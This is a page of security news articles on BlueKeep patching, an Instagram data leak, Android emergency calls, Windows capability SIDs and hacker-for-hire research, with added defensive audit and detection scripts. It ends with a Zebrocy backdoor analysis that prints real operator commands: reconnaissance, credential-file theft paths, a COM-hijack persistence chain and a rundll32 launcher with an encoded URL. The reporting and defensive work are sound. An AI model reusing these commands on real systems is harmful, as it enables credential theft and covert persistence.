Patch now! Why the BlueKeep vulnerability is a big deal

What you need to know about the critical security hole that could enable the next WannaCryptor

Remember the panic that hit organizations around the world on May 12th, 2017 when machine after machine displayed the WannaCryptor ransom screen? Well, we might have a similar incident on our hands in the coming days, weeks or months if companies don’t update or otherwise protect their older Windows systems right away. The reason is BlueKeep, a ‘wormable’ critical Remote Code Execution (RCE) vulnerability in Remote Desktop Services that could soon become the new go-to vector for spreading malware. A patch by Microsoft for supported, as well as some unsupported, operating systems has been available since May 14th.

The BlueKeep vulnerability was found in Remote Desktop Services (also known as Terminal Services). If successfully exploited in the future, it could enable access to the targeted computer via a backdoor with no credentials or user interaction needed.

To make the bad news even worse, the vulnerability is ‘wormable’. This means that future exploits might use it to spread malware within or outside of networks in similar ways to what was seen with WannaCryptor.

Following Microsoft’s release of these latest patches, security researchers were able to create several working proofs-of-concept, but at the time of writing, none of these have been publicly released and there are no known cases of the flaw being exploited in the wild.

The flaw, listed as CVE-2019-0708, affects multiple in-support and out-of-support versions of Microsoft’s operating systems. Users of Windows 7, Windows Server 2008 R2, and Windows Server 2008 with automatic updates enabled are protected. Microsoft also issued special updates for two non-supported versions – namely Windows XP and Windows 2003 – which are available via this site. Windows 8 and Windows 10 are not affected by the vulnerability.

Microsoft has not released patches for Windows Vista, despite this version also being affected by the vulnerability. The only solution here is to disable Remote Desktop Protocol (RDP) completely or only allow its use when accessed via VPN.

It is important to note that any company using misconfigured RDP over the internet is putting its users and resources at risk. Apart from vulnerabilities such as BlueKeep, attackers also try to brute force their way into company machines and internal systems.

The BlueKeep case bears a strong resemblance to the events from two years ago. On March 14th, 2017, Microsoft released fixes for a wormable vulnerability in the Server Message Block (SMB) protocol, advising all users to patch their Windows machines immediately.

The reason for this was the EternalBlue exploit – a malicious tool allegedly designed by and stolen from the National Security Agency (NSA) – which targeted the SMB loophole. A month later, EternalBlue leaked online and in a few weeks became the vehicle for the two most damaging cyberattacks in recent history – WannaCry(ptor) and NotPetya (Diskcoder.C).

A similar scenario might unfold with BlueKeep given its wormable nature. Right now, it is only a matter of time until someone publishes a working exploit or a malware author starts selling one on the underground markets. Should that happen, it will probably become very popular among less skilled cybercriminals and also a lucrative asset for its originator.

BlueKeep will also show if organizations around the world learned a lesson after the large 2017 outbreaks and improved their security posture and patching routines.

To sum it up, organizations and users are advised to:

Patch, patch, patch. If you or your organization run a supported version of Windows, update it to the latest version. If possible, enable automatic updates. If you are still using unsupported Windows XP or Windows 2003 – for whatever reason – download and apply the patches as soon as possible.

Disable Remote Desktop Protocol. Despite RDP itself not being vulnerable, Microsoft advises organizations to disable it until the latest patches have been applied. Further, to minimize your attack surface, RDP should only be enabled on devices where it really is used and needed.

Configure RDP properly. If your organization absolutely must use RDP, avoid exposing it to the public internet. Only devices on the LAN, or accessing via a VPN, should be able to establish a remote session. Another option is to filter RDP access using a firewall, whitelisting only a specific IP range. If this is not possible, use multi-factor authentication.

Enable Network Level Authentication (NLA). BlueKeep can be partially mitigated by having NLA enabled, as it requires the user to authenticate before a remote session is established and the flaw can be misused. However, as Microsoft adds, “affected systems are still vulnerable to Remote Code Execution (RCE) exploitation if the attacker has valid credentials that can be used to successfully authenticate.”

Use a reliable multi-layered security solution that can detect and mitigate attacks exploiting the flaw at the network level.

22 May 2019 – 07:41PM
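The RDP checks in the list above (is Remote Desktop on, is NLA required, is the firewall rule open to the whole internet) can be audited and, optionally, corrected from an elevated PowerShell session. The script below is an added example written for this article, not code from ESET or Microsoft; it reads the registry values Windows uses for those settings and the built-in "Remote Desktop" firewall rule group, and the $AllowedRange value is a placeholder you replace with your own LAN or VPN range. It assumes Windows 8 / Server 2012 or later for the NetSecurity firewall cmdlets.

```powershell
# Added example (not from the article): audit RDP exposure and NLA on this host,
# and with -Remediate apply the mitigations listed above.
# Run elevated. $AllowedRange is a placeholder management subnet.
param(
    [switch]$Remediate,
    [string]$AllowedRange = '10.0.0.0/24'   # placeholder: your LAN or VPN range
)

$tsKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$rdpKey = "$tsKey\WinStations\RDP-Tcp"

# fDenyTSConnections = 1 means Remote Desktop is disabled on this machine.
$rdpDisabled = (Get-ItemProperty -Path $tsKey  -Name fDenyTSConnections).fDenyTSConnections -eq 1
# UserAuthentication = 1 means Network Level Authentication is required.
$nlaRequired = (Get-ItemProperty -Path $rdpKey -Name UserAuthentication).UserAuthentication -eq 1

$findings = @()
if (-not $rdpDisabled) { $findings += 'Remote Desktop is enabled.' }
if (-not $nlaRequired) { $findings += 'NLA is NOT required; the partial BlueKeep mitigation is missing.' }

# Enabled inbound rules in the Remote Desktop group whose remote address is 'Any'
# make RDP reachable from wherever this host is routable, including the internet.
$rules = Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -Direction Inbound -ErrorAction SilentlyContinue
foreach ($rule in ($rules | Where-Object { $_.Enabled -eq 'True' })) {
    $remote = ($rule | Get-NetFirewallAddressFilter).RemoteAddress
    if ($remote -contains 'Any') {
        $findings += "Firewall rule '$($rule.DisplayName)' accepts RDP from any remote address."
    }
}

if ($findings.Count -eq 0) {
    Write-Output 'RDP is disabled or restricted with NLA required; no findings.'
} else {
    $findings | ForEach-Object { Write-Output "FINDING: $_" }
}

if ($Remediate) {
    if (-not $nlaRequired) {
        # Require NLA so a client must authenticate before a session is created.
        Set-ItemProperty -Path $rdpKey -Name UserAuthentication -Value 1
    }
    if ($rules) {
        # Limit the Remote Desktop rules to the management range only.
        $rules | Set-NetFirewallRule -RemoteAddress $AllowedRange
    }
    # On hosts that do not need RDP at all, turn it off entirely:
    # Set-ItemProperty -Path $tsKey -Name fDenyTSConnections -Value 1
}
```

Run it without switches first to see the findings, then with -Remediate once the allowed range is set. The script deliberately does not check whether the Microsoft patch is installed, because the article does not list the update identifiers; add a Get-HotFix check for the KB that applies to your Windows version, since NLA and firewall filtering only reduce exposure and the patch is the actual fix.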

Cache of 49 million Instagram records found online


A security researcher has discovered a massive cache of data for millions of Instagram accounts, publicly accessible for everyone to see. The records included sensitive information that would be useful to cyberstalkers, among others.

A security researcher calling themselves anurag sen on Twitter discovered the database hosted on Amazon Web Services. It had over 49 million records when discovered and was still growing before it was deleted.

The Instagram data included user bios, profile pictures, follower numbers and location. This information is viewable online. What’s more puzzling is that it also contained the email address and telephone number used to set up the accounts, according to TechCrunch, which broke the story.

Reporters identified the owner of the database as Mumbai-based social media company Chtrbox. It pays social media influencers to publish sponsored content through their accounts. The database has since disappeared from Amazon.

Response from Chtrbox

Chtrbox took issue with press coverage of the leaked records, sending Naked Security the following statement:

The reports on a leak of private data are inaccurate. A particular database for limited influencers was inadvertently exposed for approximately 72 hours. This database did not include any sensitive personal data and only contained information available from the public domain, or self-reported by influencers.

We would also like to affirm that no personal data has been sourced through unethical means by Chtrbox. Our database is for internal research use only, we have never sold individual data or our database, and we have never purchased hacked data resulting from social media platform breaches. Our use of our database is limited to help our team connect with the right influencers to support influencers to monetize their online presence, and help brands create great content.

How might someone compile a massive database of Instagram information?

The company wouldn’t answer any more questions, so it’s difficult to know for sure. User names, profile shots, and follower numbers are publicly available and could be gathered by screen scraping. Screen scrapers use automated scripts to visit websites and copy the information they find there.

Companies use scraped data for all kinds of purposes, such as price comparisons and sentiment analysis. It’s considered malicious and many publishers try to block it because the scrapers are using their proprietary data and also draining their server resources.

We’ve seen people scraping Instagram before. Redditors attempted to archive every image from the site that they could, for kicks.

But it can get you into trouble. Authorities in Nova Scotia, Canada arrested a 19-year-old for scraping around 7,000 freedom-of-information releases from a public web site there, calling him a hacker. They subsequently dropped the charges.

What isn’t typically public is the phone number and email address used to create the account, and which TechCrunch says was included with some records. Facebook used to make this available via the Instagram API, even for accounts that didn’t publicly list that information. It had to turn off that feature in September 2017 after it found people downloading celebrity contact details.

Some Androids don’t call 911 when you tell them to call an ambulance


Somebody’s not breathing. You panic, you grab your phone, and you call for an ambulance.

Or do you?

Unfortunately, if you’re using an Android phone, you might not be. You could instead be calling for, say, medical transportation that isn’t authorized to respond to emergencies.

As the Idaho Statesman reported recently, Android users who use voice commands may tell their smartphones to “call an ambulance” but that phrase doesn’t trigger all Androids to dial the US emergency number of 911. The newspaper didn’t specify which Android models fail to dial 911.

Tell Siri, however, to call an ambulance, and the voice assistant will dial 911. That’s a relief. But when some Android phones are given that voice command, they instead pull up a list of ambulance companies. Alternatively, they may respond with a Google search that returns, say, a blog post on when it’s appropriate to call an ambulance, the Statesman reports.

Dispatchers for Injury Care EMS – a Boise, Idaho-based company that transports patients in its ambulances, including, for example, from hospitals to nursing homes – told the news outlet that they’ve been getting a steady trickle of calls that were meant to go to 911.

The reason for that may well be that Injury Care EMS is the first company that appears in a Google list of ambulance companies in the Boise area. Injury Care EMS owner Dr. Richard Radnovich and his dispatchers told the Statesman that they’re getting the misplaced calls several times a week.

Rich Wright, an EMT student and the community liaison for Injury Care, told the Statesman that one such recent call was from a mother whose son drank too much. She was trying to get paramedics to help him out, he said:

It was a mom who was panicked, and she was trying to do the best she could to get an ambulance to her son, and we just happened to be the company that her phone had dialed.

Dispatchers are telling such callers that they need to hang up and dial 911, but even the few seconds it takes to tell them that, and for the callers to hang up and call the right number, eats up precious time during an emergency. It takes up even more time if the caller is confused and the dispatcher needs to explain it more thoroughly.

Life-saver Siri

We’ve seen multiple instances of Siri being used to call emergency services and then being credited for saving people’s lives, all because precious time was saved when getting medical attention to people in need.

There was one such case in 2017, when a 4-year-old saved his mother’s life by telling Siri to please dial 999 – the British emergency services number – to “save Mummy’s life.”

A year before that, an Australian mother, rushing to the nursery when a baby monitor showed her 1-year-old had stopped breathing, dropped her phone while she was turning on the light. She still managed to tell Siri to call for help while she performed CPR. Both she and her husband credited the few precious seconds that Siri gave them for potentially making all the difference.

The outcome of that particular story is one of the upsides of the fact that then-recent iPhones picked up the ability to always be listening for commands. That feature came about in iOS 9, when Apple enabled activation of the built-in personal assistant at the sound of your voice, rather than waiting for you to hold down the Home button.

A question of public safety

Those are some of the ways in which Siri has been credited with saving lives. Google’s voice assistant? Not so much. At least, it hasn’t featured in headlines about saving mummies or babies, though that certainly doesn’t mean it hasn’t happened.

At any rate, Radnovich reached out to the Statesman because he sees the issue as a question of public safety. He also reached out to Google, but neither he nor the newspaper got much satisfaction out of the company.

From an email sent by a Google spokeswoman to the Statesman:

The supported query for the Google Assistant is ‘Hey Google, call 911.’ This will trigger the Assistant to call 911. Asking the Assistant to ‘call an ambulance’ is not currently supported and we don’t encourage use of that voice command.

OK… so, can’t Google just, like, rewrite the code so that the “call an ambulance” voice command triggers a call to 911, as Wright suggests?

Sorry, Google, but your failure to do so does not compute.

Android users, we can’t tell you which models call 911 when you ask for an ambulance or which don’t. So in lieu of Google changing things around so that the voice command triggers a 911 call, please do try to remember that in the US, it’s safest to dial 911, or tell Google voice assistant to dial 911, not an ambulance.

Heaven knows what you’ll get if you don’t.

Don’t break Windows 10 by deleting SID, Microsoft warns


Windows account security identifiers (SIDs) were the subject of a warning issued by Microsoft telling users and admins not to delete one sub-type of SID, in case they inadvertently break applications.

It’s not clear what prompted Microsoft to issue the caution for a type of SID that has been part of its OS since Windows 8 and Windows Server 2012, but the implication is that a lack of awareness has been causing support problems.

A bit like the Unix UID, SIDs are a fundamental part of the Windows system for identifying users, accounts, and groups and deciding whether one has permission to access the other.

If a Windows user (Alice, let’s say) sets up an account on her computer in her name, Windows identifies the account using a unique SID. Alice can change her account name as often as she wants (to AliceB or even Jeff), but the underlying SID that identifies it to Windows will always stay the same.

The 2012 overhaul expanded SIDs to cover things like file access, drive locations, access to certificates, cameras, removable storage etc. Each one became a ‘capability’ that a user or application could have, or not have, the rights to access.

According to Microsoft, Windows 10 1809 can use more than 300 of these, one of the most commonly encountered of which looks like this:

S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681

It’s not hard to see why this might confuse anyone who delves into their Registry using the editor (Start > Run > regedt32.exe) where it appears as ‘account unknown’ with full read access.

After research, it seems that this might be something Windows itself needs to restart after a reboot, a sort of global SID.

That means that anyone who deletes it without understanding this purpose could break Windows itself. As Microsoft’s warning states:

DO NOT DELETE capability SIDs from either the Registry or file system permissions. Removing a capability SID from file system permissions or registry permissions may cause a feature or application to function incorrectly. After you remove a capability SID, you cannot use the UI to add it back.

A further search reveals users asking support forums for advice on this SID, unaware that it is legitimate, plus examples where admins have deleted it and live to regret the decision.

‘Unfriendly’ names

So how do admins resolve which of these are legitimate SIDs and which might be suspicious?

Microsoft admits that capability IDs are not ‘friendly’ (i.e. easy to understand), so using these on their own won’t be much help. It even notes:

By design, a capability SID does not resolve to a friendly name.

The answer is that all capability SIDs should appear in the registry – Start > Run > regedt32.exe, and navigate to the following registry entry:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SecurityManager\CapabilityClasses\AllCachedCapabilities

If it doesn’t appear in this list then it warrants further investigation, bearing in mind that it might still be a legitimate third-party capability.
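The lookup Microsoft describes can be scripted rather than done by eye in the registry editor. The script below is an added example written for this article, not code from Microsoft or Naked Security: for a given file or registry path it lists the access-control entries that show up as ‘Account Unknown’, and for each one that carries the S-1-15-3 capability prefix it checks whether the SID string appears anywhere under AllCachedCapabilities. It assumes Windows 8 / Server 2012 or later, and reads both value names and value data of that key so it does not depend on the exact layout of the entries.

```powershell
# Added example (not from the article or Microsoft): find unresolvable SIDs in
# the ACL of $Path and say whether each is a capability SID Windows knows about.
param(
    [Parameter(Mandatory = $true)]
    [string]$Path   # e.g. 'C:\Windows\System32' or 'HKLM:\SOFTWARE\Classes\CLSID'
)

$cacheKey = 'HKLM:\SOFTWARE\Microsoft\SecurityManager\CapabilityClasses\AllCachedCapabilities'

# Flatten the cache key into one list of strings (value names plus value data).
$cached = @()
$props = (Get-ItemProperty -Path $cacheKey).PSObject.Properties |
    Where-Object { $_.Name -notlike 'PS*' }   # skip PowerShell's PSPath/PSParentPath etc.
foreach ($p in $props) {
    $cached += $p.Name
    $cached += @($p.Value) | ForEach-Object { "$_" }
}

function Test-ResolvableSid([string]$SidString) {
    # A SID that translates to an account name is a normal user or group,
    # not a capability SID (which by design never resolves to a friendly name).
    try {
        $sid = New-Object System.Security.Principal.SecurityIdentifier($SidString)
        [void]$sid.Translate([System.Security.Principal.NTAccount])
        return $true
    } catch {
        return $false
    }
}

$acl = Get-Acl -Path $Path
foreach ($ace in $acl.Access) {
    $id = $ace.IdentityReference.Value
    if ($id -notmatch '^S-1-') { continue }       # already shown as a name
    if (Test-ResolvableSid $id) { continue }      # resolvable, so not 'Account Unknown'

    # Registry ACEs expose RegistryRights, file system ACEs expose FileSystemRights.
    $rights = if ($ace.PSObject.Properties['RegistryRights']) { $ace.RegistryRights }
              else { $ace.FileSystemRights }

    if ($id -like 'S-1-15-3-*') {
        # S-1-15-3 is the prefix Windows uses for capability SIDs.
        $known = ($cached -contains $id) -or (($cached | Where-Object { $_ -like "*$id*" }).Count -gt 0)
        $status = if ($known) { 'known capability SID: leave in place' }
                  else { 'capability SID not under AllCachedCapabilities: investigate (may be third-party)' }
    } else {
        $status = 'unresolvable SID outside the capability range (orphaned account?)'
    }

    [pscustomobject]@{ SID = $id; Rights = $rights; Status = $status }
}
```

Point it at the path whose ACL showed the ‘account unknown’ entry; a result marked as a known capability SID is exactly the case Microsoft warns about, and should be left alone rather than removed.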

Most hackers for hire are scammers, research shows


Hackers for hire are a bunch of swindlers, according to research published last week by Google and academics from the University of California, San Diego.

The researchers were specifically interested in a segment of black-market services known as hackers for hire: the crooks you send in when you lack the hacking skills to do the job yourself and the morals that whisper in your ear that this is not a nice, or legal, thing to do.

Such services offer targeted attacks that remain a potent threat, the researchers said, due to the fact that they’re so tailored. Think of spearphishing or whaling attacks that are so convincing because they get all the details right, such as forging company invoices or setting up copycat log-in sites that steal account credentials.

That kind of thing takes effort. Fortunately, most hackers for hire aren’t up to the task, to say the least. Many were outright scams – not too surprising – and some wouldn’t even take on the job if it involved attacking Gmail. For those services that did agree to take on the challenge of hacking Gmail accounts, the cost ballooned over the course of two years, from $123 to $384 – with a peak of $461 in February 2018.

Yahoo hacking prices have tracked the same as Google, while Facebook and Instagram hacking prices have actually fallen to the current average of $307.

The researchers hypothesize that the price differences for hacking the various email providers and the change in pricing are likely driven by what they call both operational and economic factors: namely, Google and Yahoo have gotten better at protecting email accounts, while prices have increased as the market for a specific service shrinks:

Prices will naturally increase as the market for a specific service shrinks (reducing the ability to amortize sunk costs on back-end infrastructure for evading platform defenses) and also as specific services introduce more, or more effective, protection mechanisms that need to be bypassed (increasing the transactional cost for each hacking attempt).

Overall, hackers for hire are pleasingly incompetent… or frauds

What’s sure to keep people’s accounts secure is surely aggravating the weasels who want to pay somebody to take them over. Namely, the hijacking ecosystem is “far from mature,” the researchers concluded.

They tested it out by setting up bogus online buyer personas with which to approach 27 hacking-for-hire services. The researchers tasked those services with compromising particular victim accounts.

Those supposed “victims” were actually honeypot Gmail accounts operated in coordination with Google.

Only five of the services they contacted delivered on their promise to attack the supposed victims. The rest were scammers, demurred when it came to attacking Gmail accounts, or had lousy customer service, they said:

Just five of the services we contacted delivered on their promise to attack our victim personas. The others declined, saying they could not cover Gmail, or were outright scams. We frequently encountered poor customer service, slow responses, and inaccurate advertisements for pricing.

The other good news: U2F (Universal 2nd Factor) security keys are working, the researchers said:

Further, the current techniques for bypassing 2FA can be mitigated with the adoption of U2F security keys.

… we would be remiss were we not to mention that Google last week got U2F egg on its face when it had to recall its Titan Bluetooth U2F keys after finding a security flaw.

Google has argued that Titan keys are still more secure than relying on just a password for access, and true, an attacker has to be within about 10 meters and has to launch their attack just as you press the button on your Titan key… and needs to know your username and password in advance.

So we’ll grant the researchers that point.

Sum it all up, and the researchers don’t think the hackers-for-hire market is a large-scale threat at this point:

We surmise from our findings, including evidence about the volume of real targets, that the commercial account hijacking market remains quite small and niche. With prices commonly in excess of $300, it does not yet threaten to make targeted attacks a mass market threat.

A journey to Zebrocy land

ESET sheds light on commands used by the favorite backdoor of the Sednit group

What happens when a victim is compromised by a backdoor and the operator is controlling it? It’s a difficult question that is not possible to answer entirely by reverse engineering the code. In this article we will analyze commands sent by the operator to their targets.

The Sednit group – also known as APT28, Fancy Bear, Sofacy or STRONTIUM – has been operating since at least 2004 and has made headlines frequently in past years.

Recently, we unveiled the existence of a UEFI rootkit, called LoJax, which we attribute to the Sednit group. This is a first for an APT group, and shows Sednit has access to very sophisticated tools to conduct its espionage operations.

Three years ago, the Sednit group unleashed new components targeting victims in various countries in the Middle East and Central Asia. Since then, the number and diversity of components has increased drastically. ESET researchers and colleagues from other companies have documented these components; however, in this article we will focus on what’s beyond the compromise, what the operators do once a victim system is running a Zebrocy Delphi backdoor.

At the end of August 2018, the Sednit group launched a spearphishing email campaign where it distributed shortened URLs that delivered the first stage of Zebrocy components. In the past, Sednit used a similar technique for credential phishing. However, it is unusual for the group to use this technique to deliver one of its malware components directly. Previously, it had used exploits to deliver and execute the first stage malware, while in this campaign the group relied entirely on social engineering to lure victims into running the first part of the chain. The screenshot in Figure 1 shows Bitly statistics for the shortened URL used in this campaign.

Figure 1. Statistics of the Bitly URL

About 20 clicks were recorded on this link in the same week that the URL was created, and these presumably downloaded the target archive. Let’s keep in mind that this may mean fewer than 20 potential victims, as victims may have clicked on the URL twice, or maybe even more times, because the outcome was not what they expected… as we will describe below.

While ESET telemetry data indicates that this URL was delivered by spearphishing emails, we don’t have a sample of such an email. The shortened URL leads the victim to an IP-address-based URL, where the archived payload is located.

Unfortunately, without the email message, we don’t know if there are any instructions for the user, if there is any further social engineering, or if it relies solely on the victim’s curiosity. The archive contains two files; the first is an executable file, while the second is a decoy PDF document.

Figure 2. Files extracted from the archive (Google Translate suggests “CATALOGUE – (2018).exe” and “Order 97.pdf” from the Ukrainian)

Note there is a typo in the executable’s filename; it should be “ДОВIДНИК” instead of “ДОВIДНIК”. Once the binary is executed, a password prompt dialog box opens. The result of the password validation will always be wrong, but after the apparent validation attempt, the decoy PDF document is opened. That document appears to be empty, but the downloader, which is written in Delphi, continues running in the background. The IP address is also used in the URL hardcoded into the first binary downloader.

The Stage-1 downloader downloads and executes a second downloader, written in C++, which is not so different from other Zebrocy downloaders: it is just as straightforward, creates an ID for the victim, and downloads a new and interesting backdoor, this time written in Delphi.

As we explained in our most recent blogpost about Zebrocy, the configuration of the backdoor is stored in the resource section and is split into four different hex-encoded, encrypted blobs. These blobs contain the different parts of the configuration.

Figure 3. Overview of the resource section

Once the backdoor sends basic information about its newly compromised system, the operators take control of the backdoor and start to send commands right away.

Hence, the time between the victim running the downloader and the operators’ first commands is only a few minutes.

In this section we describe in more detail the commands performed manually by the operators through their Delphi backdoor.

The commands available are located in one of the configuration blobs mentioned earlier (the “commands” blob in Figure 3). The number of supported commands has increased over time, with the latest version of the backdoor having more than thirty. As we did not identify a pattern in the order in which the commands are invoked, we believe the operators are executing them manually.

The first set of commands gathers information about the victim’s computer and environment:

Command        Arguments
SCREENSHOT     None
SYS_INFO       None
GET_NETWORK    None
SCAN_ALL       None

The commands above are commonly executed when the operators first connect to a newly activated backdoor. They take no arguments and are quite self-explanatory. Other commands commonly seen shortly after these backdoors are activated are listed below:

Command              Arguments
REG_GET_KEYS_VALUES  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
DOWNLOAD_DAY(30)     c:\*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg;*.jpeg;
                     *.bmp;*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf;*.lhz;
                     d:\*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg;*.jpeg;
                     *.bmp;*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf;*.lhz;
DOWNLOAD_DAY(1)      c:\*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg*.jpeg
                     *.bmp*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf;
                     d:\*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg*.jpeg
                     *.bmp*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf;
CMD_EXECUTE          echo %APPDATA%
                     ipconfig /all
                     netstat -aon
CMD_EXECUTE          wmic process get Caption,ExecutablePath
                     reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /s

Those who have already read our previous articles about Zebrocy will notice that more or less the same kind of information is sent over and over again by the successive stages. It is requested within a few minutes of initial compromise, and the amount of data the operator has to deal with is quite considerable.
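As an added example (not ESET’s code and nothing from the Zebrocy toolset), the Python script below shows what the CMD_EXECUTE reconnaissance above looks like from the defender’s side: a burst of discovery commands (echo %APPDATA%, ipconfig /all, netstat -aon, wmic process get, reg query ...\Run) spawned by one parent process within a few minutes. The pipe-separated record layout is an assumption for the example, and the host names, PIDs, parent image path and timestamps are constructed; in practice the records would come from Sysmon event ID 1 or Windows security event 4688 with command-line auditing enabled. The second host in the sample issues two of the same commands hours apart and is deliberately not flagged.

```python
"""Detect a burst of host-discovery commands issued by one parent process.

Added example, not ESET's code and not part of the Zebrocy toolset. It models
the CMD_EXECUTE reconnaissance described in the article (echo %APPDATA%,
ipconfig /all, netstat -aon, wmic process get, reg query ...\\Run) as it would
appear in process-creation telemetry. The record layout
    timestamp|host|parent_pid|parent_image|command_line
is an assumption for this example, and the sample records are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One regex per discovery step the operators were observed issuing.
DISCOVERY_PATTERNS = {
    "env_dump":     re.compile(r"\becho\s+%\w+%", re.I),
    "ipconfig_all": re.compile(r"\bipconfig(\.exe)?\s+/all\b", re.I),
    "netstat_aon":  re.compile(r"\bnetstat(\.exe)?\s+-aon\b", re.I),
    "wmic_process": re.compile(r"\bwmic(\.exe)?\s+process\s+get\b", re.I),
    "reg_run_key":  re.compile(r"\breg(\.exe)?\s+query\s+.*CurrentVersion\\Run\b", re.I),
    "systeminfo":   re.compile(r"\bsysteminfo(\.exe)?\b", re.I),
}

# Constructed telemetry: WS-17 shows the operator sequence from the article,
# WS-22 shows two unrelated admin commands hours apart (must not alert).
SAMPLE_LOG = r"""
2018-08-29T09:12:01|WS-17|4120|C:\Users\ivan\Downloads\catalogue.exe|cmd.exe /c echo %APPDATA%
2018-08-29T09:12:03|WS-17|4120|C:\Users\ivan\Downloads\catalogue.exe|cmd.exe /c ipconfig /all
2018-08-29T09:12:04|WS-17|4120|C:\Users\ivan\Downloads\catalogue.exe|cmd.exe /c netstat -aon
2018-08-29T09:13:40|WS-17|4120|C:\Users\ivan\Downloads\catalogue.exe|cmd.exe /c wmic process get Caption,ExecutablePath
2018-08-29T09:13:41|WS-17|4120|C:\Users\ivan\Downloads\catalogue.exe|cmd.exe /c reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /s
2018-08-29T09:30:00|WS-22|2208|C:\Windows\explorer.exe|cmd.exe /c ipconfig /all
2018-08-29T11:05:00|WS-22|2208|C:\Windows\explorer.exe|cmd.exe /c netstat -aon
"""


def parse_events(text):
    """Parse pipe-separated records into dicts; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, ppid, parent, cmd = line.split("|", 4)
        events.append({"ts": datetime.fromisoformat(ts), "host": host,
                       "ppid": int(ppid), "parent": parent, "cmd": cmd})
    return events


def classify(cmdline):
    """Name the discovery step a command line corresponds to, or None."""
    for name, pattern in DISCOVERY_PATTERNS.items():
        if pattern.search(cmdline):
            return name
    return None


def find_discovery_bursts(events, window=timedelta(minutes=5), min_distinct=3):
    """Alert on (host, parent) pairs that issue at least min_distinct distinct
    discovery steps inside one sliding window of length `window`."""
    per_parent = defaultdict(list)
    for ev in events:
        step = classify(ev["cmd"])
        if step:
            per_parent[(ev["host"], ev["ppid"], ev["parent"])].append((ev["ts"], step))

    alerts = []
    for (host, ppid, parent), hits in per_parent.items():
        hits.sort()  # chronological
        for i, (start, _) in enumerate(hits):
            steps = {s for t, s in hits[i:] if t - start <= window}
            if len(steps) >= min_distinct:
                alerts.append({"host": host, "parent_pid": ppid, "parent_image": parent,
                               "first_seen": start.isoformat(), "techniques": sorted(steps)})
                break  # one alert per parent is enough
    return alerts


def run_sample():
    """Run the detector over the constructed telemetry above."""
    return find_discovery_bursts(parse_events(SAMPLE_LOG))


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

The threshold of three distinct steps in five minutes is a starting point, not a tuned value: administrators run ipconfig and netstat too, which is why the rule keys on variety from a single parent rather than on any one command, and why the parent image (here a freshly downloaded executable) is carried into the alert for the analyst.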

In order to collect even more information, from time to time the Zebrocy operators upload and use dumpers on victims’ machines. The current dumpers have some similarities with those previously used by the group. In this case, Yandex Browser, Chromium, 7Star Browser (a Chromium-based browser), and CentBrowser are targeted, as well as versions of Microsoft Outlook from 1997 through 2016:

Command                  Arguments
UPLOAD_AND_EXECUTE_FILE  C:\ProgramData\Office\MS\msoffice.exe
                         […]
                         4D5A9000…

(The second argument is the hex-encoded executable itself; 4D5A9000 is the MZ header of a PE file.)

These dumpers create log files indicating the presence or absence of potential databases to dump:

Command        Arguments
DOWNLOAD_LIST  C:\ProgramData\Office\MS\out.txt
               C:\ProgramData\Office\MS\text.txt

The current dumper writes the following output when there are no databases to dump:

%LOCALAPPDATA%\Yandex\YandexBrowser\User Data\Default\Login Data not found
%LOCALAPPDATA%\Chromium\User Data\Default\Login Data not found
%LOCALAPPDATA%\7Star\7Star\User Data\Default\Login Data not found
%LOCALAPPDATA%\CentBrowser\User Data\Default\Login Data not found

These dumpers are quickly removed once they have done their job. Moreover, the backdoor contains a list of filenames related to credentials from software listed below (database names):

File          Software and contents
key3.db       Firefox private keys (now named key4.db)
cert8.db      Firefox certificate database
logins.json   Firefox encrypted password database
account.cfn   The Bat! (email client) account credentials
wand.dat      Opera password database

The operators take care of retrieving these databases if they are present on the victim’s computer.

Command        Arguments
DOWNLOAD_LIST  %APPDATA%\The Bat!\Account.CFN
               %APPDATA%\The Bat!\[REDACTED]\Account.CFN

The operators retrieve these files on the machine using the DOWNLOAD_LIST command. This command can be used when the operators are aware of the presence of interesting files on the computer.

Finally, depending on how interesting the victim is, the malware operators may deploy another custom backdoor. This backdoor is installed and executed using the CMD_EXECUTE command:

Command      Arguments
CMD_EXECUTE  reg add "HKCU\Software\Classes\CLSID\{0CD069CF-AC9B-41F4-9571-3A95A62C36A1}" /ve /d "Reliability Maintenance Control Panel" /reg:64 /f&&reg add "HKCU\Software\Classes\CLSID\{0CD069CF-AC9B-41F4-9571-3A95A62C36A1}\InProcServer32" /ve /d "%APPDATA%\Microsoft\WinSupport\RMC\mtrcpl.dll" /reg:64 /f&&reg add "HKCU\Software\Classes\CLSID\{0CD069CF-AC9B-41F4-9571-3A95A62C36A1}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Both" /reg:64 /f
             rundll32.exe "%APPDATA%\Microsoft\WinSupport\RMC\mtrcpl.dll",#1 687474703A2F2F[REDACTED]
             dir /s /b /o:gn %APPDATA%\Microsoft

